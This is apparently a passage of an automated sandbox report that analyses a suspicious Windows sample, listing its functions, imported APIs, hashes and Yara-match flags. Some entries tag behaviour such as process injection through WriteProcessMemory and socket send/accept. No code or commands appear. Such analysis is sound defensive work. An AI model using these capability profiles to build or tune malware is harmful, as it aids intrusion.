Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: this${parm#$}
API String ID: 0-3278767634
Opcode ID: 0bcec4e266cfe60dc0d68c5200d00d3cc83fc1d309cebb6b9a50da18646fa7a9
Instruction ID: 705a61767d4a5021dd98136534d41b5352137a791a50a9a9fde48b7f9d9612e0
Opcode Fuzzy Hash: 0bcec4e266cfe60dc0d68c5200d00d3cc83fc1d309cebb6b9a50da18646fa7a9
Instruction Fuzzy Hash: 3E51F5B3788AC285D716DF25D4043EA2751E756B98F0C8036CF891B788DA7CD486D366

Uniqueness

Uniqueness Score: -1.00%

Function 00467300 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0046741B
memcpy.MSVCRT ref: 00467466

Strings

basic_ios::clear, xrefs: 00467309

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memcpy
String ID: basic_ios::clear
API String ID: 3510742995-82543608
Opcode ID: 605cc01b731bb32df71f4f0c3121a9c3560550831f47c30599bc7f2c1cf71997
Instruction ID: 7181ee3bf818335d943b94c9a1b30cde38687916e8d8f861cc09dba6bc59ca94
Opcode Fuzzy Hash: 605cc01b731bb32df71f4f0c3121a9c3560550831f47c30599bc7f2c1cf71997
Instruction Fuzzy Hash: 893114B270AAE485CA00DF2AC44896E6B24F751FDCB588017EF1947755FB39C982D346

Uniqueness

Uniqueness Score: -1.00%

Function 03A72A1C Relevance: 6.1, APIs: 4, Instructions: 96injectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03A72A79
WriteProcessMemory.KERNEL32 ref: 03A72AB2
GetLastError.KERNEL32 ref: 03A72B14
GetLastError.KERNEL32 ref: 03A72B1F

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: ErrorLast$MemoryProcessWrite
String ID:
API String ID: 3937020117-0
Opcode ID: 758ccf515d5a04f9bcb79f0e870055d01cc9422dd9159b1358783e9b0281404f
Instruction ID: da17255db2449e690498a5799037d68ce11ff1ff1c9021021bf19b2b363baf12
Opcode Fuzzy Hash: 758ccf515d5a04f9bcb79f0e870055d01cc9422dd9159b1358783e9b0281404f
Instruction Fuzzy Hash: 7F310766701B5086DB25EF36ADD4B6EB3A4BB88B80F48042B9E8947714EF3CC206C740

Uniqueness

Uniqueness Score: -1.00%

Function 00406D28 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00406D83

Strings

, xrefs: 00406DE1
: , xrefs: 004096C3
new , xrefs: 00406D90

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: strcmp
String ID: $ : $new
API String ID: 1004003707-2075650739
Opcode ID: 408f23c036ee6003e58d4e486262d834a2206da59648b88b989b5918e41324c9
Instruction ID: 7ab23255c39c740f8672f403265125e4df55e0c84fd1a6fc181dcf5a8227213b
Opcode Fuzzy Hash: 408f23c036ee6003e58d4e486262d834a2206da59648b88b989b5918e41324c9
Instruction Fuzzy Hash: 27316F72344B8981DB15DF22D4083AA3761F786FC8F48843B8E462B7A5CE7CC985C359

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE70 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 0040DECD
MultiByteToWideChar.KERNEL32 ref: 0040DF0D

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 4a1a4d1c7d367f262de61f0face690f4b8e292f1dc298d631db7ba02733bf16f
Instruction ID: c3074531f947899ccdd71761d7b21e5aec90d72ac9efd2192760d5ad08c6381b
Opcode Fuzzy Hash: 4a1a4d1c7d367f262de61f0face690f4b8e292f1dc298d631db7ba02733bf16f
Instruction Fuzzy Hash: 1D31FE736186C18AD3219F74F40079A7A61F785758F588126FB8A97BC9CB3DC889CB05

Uniqueness

Uniqueness Score: -1.00%

Function 03660517 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 0366055E
clock.LIBCMT ref: 0366056B
clock.LIBCMT ref: 03660574
clock.LIBCMT ref: 03660581

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
Instruction ID: ec3ae287c7a4a6dbf53eadfd4be9040ae5164a6492c9b623d0f1205e8c8a9788
Opcode Fuzzy Hash: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
Instruction Fuzzy Hash: 091129B580C70C4F5728FEDC964563AF7D0EB89290F19063EE8CAC7212E950DC4386D6

Uniqueness

Uniqueness Score: -1.00%

Function 0367D473 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

_IsNonwritableInCurrentImage.LIBCMT ref: 0367D490

Part of subcall function 03681847: _FindPESection.LIBCMT ref: 03681870

_initp_misc_cfltcvt_tab.LIBCMT ref: 0367D4A1
_initterm_e.LIBCMT ref: 0367D4B4
_IsNonwritableInCurrentImage.LIBCMT ref: 0367D4FD

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
String ID:
API String ID: 1991439119-0
Opcode ID: d0aacdeab6c747e7db722564a7347f1053155731eb9de77eec07b84fb13a130c
Instruction ID: 0aa9a56b0a6659b0e855fbd0bc077e41ecf59bd5a035f59a3469c99e29afbf2e
Opcode Fuzzy Hash: d0aacdeab6c747e7db722564a7347f1053155731eb9de77eec07b84fb13a130c
Instruction Fuzzy Hash: 6011C830214B088BF716FF34DCD46A6B368FF45344F884A2A8443C6174EF789A45C758

Uniqueness

Uniqueness Score: -1.00%

Function 03A610D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 03A61117
clock.LIBCMT ref: 03A61124
clock.LIBCMT ref: 03A6112D
clock.LIBCMT ref: 03A6113A

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
Instruction ID: 45a61e1a93ec6da1880d4bacd86f5d51aec7b7a3a8994944bc2b9231aa4c9839
Opcode Fuzzy Hash: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
Instruction Fuzzy Hash: 06112B32604B85459771EFA6A98052BFE50F7847E4F1D412FEE5457704EA78C885CA50

Uniqueness

Uniqueness Score: -1.00%

Function 03A8D498 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03A8D4BC

Part of subcall function 03A7F454: _getptd.LIBCMT ref: 03A7F46A
Part of subcall function 03A7F454: __updatetlocinfo.LIBCMT ref: 03A7F49F
Part of subcall function 03A7F454: __updatetmbcinfo.LIBCMT ref: 03A7F4C6

_errno.LIBCMT ref: 03A8D4C8

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

_invalid_parameter_noinfo.LIBCMT ref: 03A8D4D3
strchr.LIBCMT ref: 03A8D4E9

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
String ID:
API String ID: 4151157258-0
Opcode ID: 9dcbabed976c9cb14c0e816df6bc5d9f8365d97b9e504a800266228e51b7a280
Instruction ID: 9d073b011d8c9bfb22fb5c5861842be38fb7bf499b059ca653a17e65a76fc64d
Opcode Fuzzy Hash: 9dcbabed976c9cb14c0e816df6bc5d9f8365d97b9e504a800266228e51b7a280
Instruction Fuzzy Hash: 6811936360A2E481DB19FB15E05053DFBA0F385BECB5C512BEA964FBC8DA68C046CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0040F280 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0040F290
_fileno.MSVCRT ref: 0040F2CE
_lseeki64.MSVCRT ref: 0040F2DB
_errno.MSVCRT ref: 0040F320

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: _errno$_fileno_lseeki64
String ID:
API String ID: 2364285915-0
Opcode ID: d9171c8d29146d6a6a6db1ee936f88fc99d07df9f3965f996668948151d6717f
Instruction ID: cf699874b7afcbdb3e0037cf90f14d6482437438bd819b64feae9ecc720a9fd7
Opcode Fuzzy Hash: d9171c8d29146d6a6a6db1ee936f88fc99d07df9f3965f996668948151d6717f
Instruction Fuzzy Hash: 7101F973A1011446DA386E7A984526A71409755BF8F28073FDD3667BC5EA3C88CA86C9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F340 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0040F381

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: eb3bc6ca3f810b5cfb246bfbe16c8b4ffe5d2a587a0e1e72416046ff4f42e0bf
Instruction ID: b23a3cb5fddf5c6902a8b01c6ee51f685c9d67931b08b7b655415de7ca5b707f
Opcode Fuzzy Hash: eb3bc6ca3f810b5cfb246bfbe16c8b4ffe5d2a587a0e1e72416046ff4f42e0bf
Instruction Fuzzy Hash: E10188F3A412199AD7616F19FC813D93260A384768FDA463BCE4817390EB7C8DDACB45

Uniqueness

Uniqueness Score: -1.00%

Function 03A7CEE0 Relevance: 6.0, APIs: 4, Instructions: 39networkCOMMON

Download Yara Rule

APIs

accept.WS2_32 ref: 03A7CEF5
send.WS2_32 ref: 03A7CF33
send.WS2_32 ref: 03A7CF47
closesocket.WS2_32 ref: 03A7CF58

Part of subcall function 03A7D01C: closesocket.WS2_32 ref: 03A7D028
Part of subcall function 03A7D01C: free.LIBCMT ref: 03A7D032
Part of subcall function 03A7D01C: free.LIBCMT ref: 03A7D03B
Part of subcall function 03A7D01C: free.LIBCMT ref: 03A7D044

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: free$closesocketsend$accept
String ID:
API String ID: 47150829-0
Opcode ID: 066e2fc8adee108644c0c95b9f8e143474d501460abce45f6e5e6b60318d2000
Instruction ID: ef0f2615deeafa6e029174e7ab7aa7f64921a5a57407bae7f8ac9178d8672910
Opcode Fuzzy Hash: 066e2fc8adee108644c0c95b9f8e143474d501460abce45f6e5e6b60318d2000
Instruction Fuzzy Hash: B801447631464081DB64DB36FA94B3D6321E78EFF4F049212DEA60BB48CE29C5818741

Uniqueness

Uniqueness Score: -1.00%

Function 03A73B3C Relevance: 6.0, APIs: 4, Instructions: 34sleeppipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03A73B50
PeekNamedPipe.KERNEL32 ref: 03A73B75
Sleep.KERNEL32 ref: 03A73B8B
GetTickCount.KERNEL32 ref: 03A73B91

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: 0d8f67eb847476cbf5cd18602dcd1106d203af1aa70024b801e6f9b985edf0b0
Instruction ID: 47de73932e03e862013fcc4d686272cdaf57aae0e80cd8e8be60ed9f7663e4fc
Opcode Fuzzy Hash: 0d8f67eb847476cbf5cd18602dcd1106d203af1aa70024b801e6f9b985edf0b0
Instruction Fuzzy Hash: 42F0A436714A50C2E710CB25F88830AB3B9F7C9BC1F694126EB8D43AA4DF38C5918745

Uniqueness

Uniqueness Score: -1.00%

Function 03A731F8 Relevance: 6.0, APIs: 4, Instructions: 32sleeppipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03A73211
PeekNamedPipe.KERNEL32 ref: 03A73236
Sleep.KERNEL32 ref: 03A7324C
GetTickCount.KERNEL32 ref: 03A73252

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: 6eb8226b971c676c39cd0dac2a4860ce413c34c9835dff083589f7d44e328186
Instruction ID: 0dcf06b460be0d9556331829b79a619df48858ff963f0d6e0f968bac353dcb26
Opcode Fuzzy Hash: 6eb8226b971c676c39cd0dac2a4860ce413c34c9835dff083589f7d44e328186
Instruction Fuzzy Hash: 20F0F432614A5082E714CB15F88030AB374F7D9BC0F284135DBC843AB8DF3CC5808B44

Uniqueness

Uniqueness Score: -1.00%

Function 03A75D78 Relevance: 6.0, APIs: 4, Instructions: 32memorythreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeProcThreadAttributeList.KERNEL32 ref: 03A75D96
GetProcessHeap.KERNEL32 ref: 03A75D9C
HeapAlloc.KERNEL32 ref: 03A75DAC
InitializeProcThreadAttributeList.KERNEL32 ref: 03A75DC7

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: AttributeHeapInitializeListProcThread$AllocProcess
String ID:
API String ID: 1212816094-0
Opcode ID: 22c9adbd14fdaacc8fb1e282febc10ff812bb060a347c24def4cc05294e67cba
Instruction ID: ec0efabad9c0a66be49336372324643340773d24cc2f466e2c349bcaa55add54
Opcode Fuzzy Hash: 22c9adbd14fdaacc8fb1e282febc10ff812bb060a347c24def4cc05294e67cba
Instruction Fuzzy Hash: E7F0BB22724B8482EB85CB75F85475A63E1EB8EBC0F68542BBE4B52724DE3CC144CB00

Uniqueness

Uniqueness Score: -1.00%

Function 03A7D01C Relevance: 6.0, APIs: 4, Instructions: 15COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 03A7D028
free.LIBCMT ref: 03A7D032

Part of subcall function 03A7D188: HeapFree.KERNEL32 ref: 03A7D19E
Part of subcall function 03A7D188: _errno.LIBCMT ref: 03A7D1A8
Part of subcall function 03A7D188: GetLastError.KERNEL32 ref: 03A7D1B0

free.LIBCMT ref: 03A7D03B
free.LIBCMT ref: 03A7D044

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: free$ErrorFreeHeapLast_errnoclosesocket
String ID:
API String ID: 1525665891-0
Opcode ID: f0a14ae54f92ead1c4b4b34f15b7183d60d2bbec5c8dcb145cd9b656117da10e
Instruction ID: 2191efaf3b0e56f255693ec632fe186452a3abc2f9ad8c4eb1671c3991e960f0
Opcode Fuzzy Hash: f0a14ae54f92ead1c4b4b34f15b7183d60d2bbec5c8dcb145cd9b656117da10e
Instruction Fuzzy Hash: 80D06766B1050591DB14EB72EDE123C6320EB99FA4B5400238E5E6B764CD24C8968380

Uniqueness

Uniqueness Score: -1.00%

Function 0367976F Relevance: 5.4, APIs: 4, Instructions: 378COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 036797E2
malloc.LIBCMT ref: 03679A06
malloc.LIBCMT ref: 03679B04

Part of subcall function 0367EAB7: _getptd.LIBCMT ref: 0367EAD6

free.LIBCMT ref: 03679AEC

Part of subcall function 0367C5CF: _errno.LIBCMT ref: 0367C5EF

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: malloc$_errno_getptdfree
String ID:
API String ID: 3172138858-0
Opcode ID: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
Instruction ID: 850f7b47788755adce21de3148ffe2efcde24631c1f3d6be3b6808df183dd7a3
Opcode Fuzzy Hash: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
Instruction Fuzzy Hash: 0CB11930A29F488FE71AEF2CED916B573E9F749310B84426ED457C7260EB789442CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0048BC70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 91COMMON

Download Yara Rule

Strings

0JJ, xrefs: 0048BC9E, 0048BD22
0K, xrefs: 0048BD6C

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: 0K$0JJ
API String ID: 0-739500778
Opcode ID: 327b862ed1c298d0ce785ba950d3db0930b379fdda3224790cf34f93231df82c
Instruction ID: 8c50036fb2631756618a9aebd4222f2ad851be2ef70333495375f03b786ee12e
Opcode Fuzzy Hash: 327b862ed1c298d0ce785ba950d3db0930b379fdda3224790cf34f93231df82c
Instruction Fuzzy Hash: 4C318B7231160499EA20BF67E85176E63A1EB89BC8F48882BEE5E47705DF3CC451C399

Uniqueness

Uniqueness Score: -1.00%

Function 0367CBE7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0367CC38

Part of subcall function 0367F013: _getptd_noexit.LIBCMT ref: 0367F017

_invalid_parameter_noinfo.LIBCMT ref: 0367CC43

Strings

B, xrefs: 0367CC6F

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
Instruction ID: 616b585684c5e66e44bbf6621751e52a25511dacb3ce3dbb3c1fb2effde6699e
Opcode Fuzzy Hash: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
Instruction Fuzzy Hash: ED119130618B088FD754EF5CD485B66B7E1FB98324F5447AEA059C72A0CF74C945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 03A7D7A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03A7D7F1

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

_invalid_parameter_noinfo.LIBCMT ref: 03A7D7FC

Strings

B, xrefs: 03A7D828

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

